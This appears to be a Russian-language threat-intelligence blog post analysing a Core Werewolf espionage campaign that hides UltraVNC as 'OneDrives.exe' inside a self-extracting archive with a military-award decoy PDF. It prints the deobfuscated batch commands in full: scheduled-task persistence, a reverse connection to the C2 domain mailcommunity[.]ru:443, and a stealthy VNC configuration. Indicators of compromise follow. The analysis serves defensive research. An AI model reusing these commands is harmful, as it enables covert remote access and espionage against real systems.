Кибершпионы из Core Werewolf пытались атаковать российскую военную базу в Армении | Блог F.A.C.C.T.

Специалисты Threat Intelligence компании F.A.C.C.T. обнаружили на платформе VirusTotal загруженный из Армении (г. Гюмри) вредоносный файл, связанный с группировкой кибершпионов Core Werewolf. Он представляет собой самораспаковывающийся архив 7zSFX, предназначенный для скрытой установки и запуска легитимной программы удаленного доступа — UltraVNC.

Предполагаемой целью атаки является 102-я российская военная база. На это указывают следующие факты:

  • в качестве документа-приманки использовалось ходатайство о якобы представлении к госнаградам, в том числе «Ордену Мужества» военнослужащих, отличившихся в ходе проведения СВО;
  • вредоносный файл был загружен на VirusTotal из г. Гюмри (Армения), в котором дислоцируется 102-ая российская военная база.

Core Werewolf (PseudoGamaredon) — кибершпионская группа, которая активно атакует российские организации, связанные с оборонно-промышленным комплексом, объекты критической информационной инфраструктуры. Впервые были замечены в августе 2021 года. В марте 2024 г. Core Werewolf атаковала российский НИИ, занимающийся разработкой вооружения. А в начале апреля — российский оборонный завод. В своих кампаниях группа использует программное обеспечение UltraVNC.

Все подробности — в техническом блоге Дмитрия Купина, руководителя отдела по анализу вредоносного кода департамента Threat Intelligence компании F.A.C.C.T.

Технические детали

7zSFX-архив

Вредоносный файл 7ZSfxMod_x86.exe является исполняемым файлом формата PE32 и представляет собой самораспаковывающийся архив 7zSFX. Данный 7zSFX-архив предназначен для извлечения своего содержимого в каталог %TEMP% и запуск обфусцированного Batch-файла 5951402583331559.cmd.

При запуске самораспаковывающегося архива 7ZSfxMod_x86.exe выполняются следующие команды:

cmd.exe /c ren 5951402583331559 5951402583331559.cmd

cmd.exe /c copy /y «%CD%.» «%CD%..»

cmd.exe /c cd %USERPROFILE%\AppData\Local\Temp & 5951402583331559.cmd

Содержимое 7zSFX-архива:

  • 5951402583331559 — обфусцированный Batch-файл
  • dl02W62Y82w52l62d0.nq42X02g82l12L22i7 — конфигурационный файл UltraVNC (UltraVNC.ini)
  • Px69S29l29t79I69v3.ei89I49K79k99b89f2 — документ-приманка формата PDF (perevod.pdf)
  • TX24Y94E94D44c14G1.pZ49A49n99p49Q79c0 — исполняемый файл UltraVNC (OneDrives.exe)

Судя по дате и времени последней модификации содержащихся файлов в указанном 7zSFX-архиве, можно предположить, что атака могла начаться раньше 15 апреля 2024 г.

Дата и время последней модификации извлеченных файлов 7zSFX-архива

Дата и время последней модификации извлеченных файлов 7zSFX-архива в каталоге %TEMP%

Файл 7ZSfxMod_x86.exe был загружен на VirusTotal 2024-04-15 16:17:23 UTC из Армении (г. Гюмри) через веб-интерфейс (f7a179f4 — web).

Информация о телеметрии загруженного 7zSFX-архива на VirusTotal

Информация о телеметрии загруженного 7zSFX-архива на VirusTotal

Batch-файл

Деобфусцированное содержимое Batch-файла

Деобфусцированное содержимое Batch-файла

Функциональные возможности Batch-файла 5951402583331559.cmd:

  • Создание копии PDF-файла документа-приманки:
copy "Px69S29l29t79I69v3.ei89I49K79k99b89f2" "perevod.pdf"
  • Открытие документа-приманки для отвлечения внимания жертвы:
start "" "%CD%\perevod.pdf"
  • Создание задачи в планировщике задач Windows для завершения работы процесса OneDrives.exe:
schtasks /create /f /tn "OneDrive Standalone Task-S-2-7-11-9087201647-12801647-72314017-012" /tr "taskkill /f /im OneDrives.exe" /sc daily /st 09:11
  • Создание копии исполняемого файла UltraVNC:
copy "TX24Y94E94D44c14G1.pZ49A49n99p49Q79c0" "OneDrives.exe"
  • Принудительное завершение задачи или процесса OneDrives.exe:
taskkill /im OneDrives.exe /f
  • Создание задачи в планировщике задач Windows для запуска OneDrives.exe:
schtasks /create /f /tn "OneDrive Standalone Task-S-2-7-11-83520748-3029574812-2078745392-102" /tr "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\OneDrives.exe" /sc daily /st 09:12
  • Создание копии конфигурационного файла UltraVNC:
copy "dl02W62Y82w52l62d0.nq42X02g82l12L22i7" "UltraVNC.ini"
  • Запуск файла OneDrives.exe:
start "" %HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\OneDrives.exe
  • Создание задачи в планировщике задач Windows для запуска OneDrives.exe с параметрами подключения к серверу mailcommunity[.]ru:443:
schtasks /create /f /tn "OneDrive Standalone Update Task-S-2-7-11-99120212-424201842-3485024-093" /tr "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\OneDrives.exe -autoreconnect -id:%COMPUTERNAME%_%RANDOM% -connect mailcommunity[.]ru:443" /sc daily /st 09:13

Запуск файла OneDrives.exe с параметрами для подключения к серверу mailcommunity[.]ru:443:

start "" %HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\OneDrives.exe -autoreconnect -id:%COMPUTERNAME%_%RANDOM% -connect mailcommunity[.]ru:443

Исполняемый файл OneDrives.exe (TX24Y94E94D44c14G1.pZ49A49n99p49Q79c0) является легитимной программой удаленного доступа UltraVNC версии 1.2.0.5.

Документ-приманка

Документ-приманка perevod.pdf представляет собой ходатайство, содержащее список военнослужащих, представленных к госнаградам, в том числе — «Ордену Мужества» — за отличную службу в ходе проведения СВО, с указанием их звания, ФИО и личного номера.

Фрагмент содержимого документа-приманки (censored)

Фрагмент содержимого документа-приманки (censored)

UltraVNC

Злоумышленники используют для скрытого удаленного доступа к скомпрометированной системе легитимное ПО UltraVNC версии 1.2.0.5 с иконкой приложения OneDrive.

Иконка в ресурсах исполняемого файла OneDrives.exe

Иконка в ресурсах исполняемого файла OneDrives.exe

PDB-путь: L:\UltraVNC_INSTALL_VS2013\ultravnc_test2\UltraVNC Project Root\UltraVNC\winvnc\Release\winvnc.pdb

Конфигурационный файл UltraVNC.ini (dl02W62Y82w52l62d0.nq42X02g82l12L22i7) содержит следующие настройки:

UltraVNC.ini
arrow_drop_down

[Permissions]
[admin]
FileTransferEnabled=1
FTUserImpersonation=1
BlankMonitorEnabled=0
BlankInputsOnly=0
DefaultScale=1
UseDSMPlugin=0
DSMPlugin=
DSMPluginConfig=
primary=1
secondary=0
SocketConnect=0
HTTPConnect=0
XDMCPConnect=0
AutoPortSelect=0
PortNumber=5612
HTTPPortNumber=5800
InputsEnabled=1
LocalInputsDisabled=0
IdleTimeout=0
EnableJapInput=0
RemoveAero=0
DebugMode=0
Avilog=0
path=Y:
DebugLevel=0
AllowLoopback=0
LoopbackOnly=0
AllowShutdown=1
AllowProperties=1
AllowEditClients=1
FileTransferTimeout=30
KeepAliveInterval=5
SocketKeepAliveTimeout=10000
DisableTrayIcon=1
MSLogonRequired=0
NewMSLogon=0
ConnectPriority=0
QuerySetting=2
QueryTimeout=10
QueryAccept=0
LockSetting=0
RemoveWallpaper=0
RemoveEffects=0
RemoveFontSmoothing=0
[UltraVNC]
passwd=отредактировано
passwd2=000000000000000000

Сетевая инфраструктура

В качестве C2 злоумышленники использовали домен mailcommunity[.]ru.

Whois-информация домена mailcommunity[.]ru

Whois-информация домена mailcommunity[.]ru

Этот домен был зарегистрирован год назад одновременно с другим доменом группы Core Werewolf, который использовался в кампании в 2023 году. За день до истечения срока жизни домена злоумышленники продлили его еще на год и в этот же день начали использовать его для проведения атак.

Фрагмент сетевой инфраструктуры атакующих

Фрагмент сетевой инфраструктуры атакующих

Стоит отметить, что разворачиваемый образец UltraVNC, его конфигурационный файл и адрес C2 такие же, как и в ранее раскрытых атаках.

Связанные файлы

Также специалисты Threat Intelligence компании F.A.C.C.T. обнаружили на платформе VirusTotal загруженные из России в марте и апреле 2024 г. вредоносные исполняемые файлы, которые представляют собой ранее неописанные дропперы, реализованные на языке Go. Дропперы имеют идентичные функциональные возможности и они предназначены для скрытой установки и запуска клиента UltraVNC.

Конфигурационный файл и клиент UltraVNC совпадают по хеш-суммам с описанными выше в статье файлами, а также в качестве C2 используется тот же домен: mailcommunity[.]ru:443.

Узнайте большое о F.A.C.C.T. Threat Intelligence

Проактивный анализ киберугроз и предотвращение атак со знанием методов и инструментов атакующих

Индикаторы компрометации
arrow_drop_down

7ZSfxMod_x86.exe
MD5: b4644e784d384e419a270c8a44f41dd2
SHA-1: 210d1c0e007de3c5815b1188de989799ff6b511a
SHA-256: 0de3e1349b12a96a99784c45aebbf88012562545af6ade624e78d0ff2cfd5f35

5951402583331559 (5951402583331559.cmd)
MD5: d41d327f59c2f407a8e946d5bd333fc9
SHA-1: 36ccb806682d370baf8f0f0c7a6424601caaed9a
SHA-256: 493a08471ca2bdb89f980a5b1fb005e31bc1ca714e2da973b708d0b125d6edea

dl02W62Y82w52l62d0.nq42X02g82l12L22i7 (UltraVNC.ini)
MD5: e265d15a83e52b9ced30f6a9d747b388
SHA-1: 6e5a802e42674f6c8de74b7bea6024f637ff39e3
SHA-256: 20b23cc90cbfbef9bb7cedfbb1b75f24a03ba96af8c576263077501814df6376

TX24Y94E94D44c14G1.pZ49A49n99p49Q79c0 (OneDrives.exe)
MD5: d45bdf072094435bbb534b9a0c254af5
SHA-1: e1c24d8bfab674937f498701f8b25d07c56dada0
SHA-256: 2bac8b29b52f7ddd4fd19a1ace8bbc2e4ae4e834a41275fb5865eeb5ab805275

Дропперы на Go:
Pdf.exe
MD5: 08b6f274e353ce8baba43624eb552736
SHA-1: 5b1b74b5fe12e11366b63c0d8bce9411330cfb48
SHA-256: bc96b7ee0ec9b01d6ec7b887ca8da6f452fbcc9203d6ab0a8f8ccfe4fe91900f

Pdf.exe
MD5: df6accf05af177ac467ef9df45bfd19f
SHA-1: 12855d9329e3de89475acfeb4d77415fd703a123
SHA-256: e111527ae3ba900e98fddd61d4be45c24c559d2f6bc9b2ccd327c250d460d11b

Pdf.exe
MD5: 8ca78dd94dc795db041688a6eedf60a5
SHA-1: 70c9e8eccd43c6426cb9c86a4f76ad6d99d39dca
SHA-256: fbd4a8052a69221f27467904f83b6c36fadf0d77043ac9d0e35b2be2e43ea3a2

Pdf.exe (Указ Президента Российской Федерации от 11.03.2024 № 181.exe)
MD5: df6accf05af177ac467ef9df45bfd19f
SHA-1: 12855d9329e3de89475acfeb4d77415fd703a123
SHA-256: e111527ae3ba900e98fddd61d4be45c24c559d2f6bc9b2ccd327c250d460d11b

Домен (С2):
mailcommunity[.]ru:443

IP-адрес:
185.139.70[.]84

Дополнительные индикаторы компрометации
arrow_drop_down

Пути к файлам:

  • %TEMP%\5951402583331559.cmd
  • %TEMP%\Px69S29l29t79I69v3.ei89I49K79k99b89f2
  • %TEMP%\perevod.pdf
  • %TEMP%\dl02W62Y82w52l62d0.nq42X02g82l12L22i7
  • %TEMP%\UltraVNC.ini
  • %TEMP%\TX24Y94E94D44c14G1.pZ49A49n99p49Q79c0
  • %TEMP%\OneDrives.exe

Процессы:

  • cmd.exe /c ren 5951402583331559 5951402583331559.cmd
  • cmd.exe /c copy /y «%CD%*.*» «%CD%..»
  • cmd.exe /c cd %USERPROFILE%\AppData\Local\Temp & 5951402583331559.cmd
  • schtasks.exe /create /f /tn «OneDrive Standalone Task-S-2-7-11-9087201647-12801647-72314017-012» /tr «taskkill /f /im OneDrives.exe» /sc daily /st 09:11
  • schtasks.exe /create /f /tn «OneDrive Standalone Task-S-2-7-11-83520748-3029574812-2078745392-102» /tr «%HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\OneDrives.exe» /sc daily /st 09:12
  • schtasks.exe /create /f /tn «OneDrive Standalone Update Task-S-2-7-11-99120212-424201842-3485024-093» /tr «%HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\OneDrives.exe -autoreconnect -id:%COMPUTERNAME%%RANDOM% -connect mailcommunity[.]ru:443» /sc daily /st 09:13
  • taskkill.exe /im OneDrives.exe /f
  • OneDrives.exe -autoreconnect -id:%COMPUTERNAME%%RANDOM% -connect mailcommunity[.]ru:443
  • timeout.exe /t 1
  • timeout.exe /t 3
  • timeout.exe /t 4
  • timeout.exe /t 5

Задачи в планировщике задач Windows:

  • OneDrive Standalone Task-S-2-7-11-9087201647-12801647-72314017-012 — «taskkill /f /im OneDrives.exe»
  • OneDrive Standalone Task-S-2-7-11-83520748-3029574812-2078745392-102 — «%HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\OneDrives.exe»
  • OneDrive Standalone Update Task-S-2-7-11-99120212-424201842-3485024-093 — «%HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\OneDrives.exe -autoreconnect -id:%COMPUTERNAME%_%RANDOM% -connect mailcommunity[.]ru:443»